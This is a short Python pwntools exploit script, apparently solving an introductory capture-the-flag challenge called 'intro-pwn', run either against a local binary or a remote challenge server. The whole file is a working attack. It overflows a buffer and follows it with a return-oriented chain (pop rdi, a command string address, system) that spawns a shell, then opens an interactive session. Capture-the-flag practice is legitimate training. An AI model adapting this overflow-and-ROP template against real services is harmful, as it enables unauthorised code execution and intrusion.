35 lines
833 B
Python
35 lines
833 B
Python
from pwn import *
|
|
|
|
# Set the context for the binary
|
|
context.binary = './intro-pwn' # Replace with your binary's name
|
|
|
|
# Choose local or remote
|
|
LOCAL = True # Change to False if connecting remotely
|
|
|
|
if LOCAL:
|
|
p = process(context.binary.path)
|
|
else:
|
|
p = remote("a05e1cfb314bce1c87472c7e-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
|
def send_payload(payload):
|
|
p.sendline(payload)
|
|
|
|
def recv_until(delim):
|
|
return p.recvuntil(delim)
|
|
|
|
def interact():
|
|
p.interactive()
|
|
|
|
address = 0x4011c7
|
|
system = 0x4011d5
|
|
pop_rdi = 0x401205
|
|
command_addr = 0x402010
|
|
|
|
|
|
# Example interaction
|
|
recv_until(b'What is your name?')
|
|
payload = b'A' * 16 + b'\x00' * 8 + p64(pop_rdi) + p64(command_addr) + p64(system)# Adjust based on your needs
|
|
send_payload(payload)
|
|
|
|
interact() # Keep the shell open
|
|
|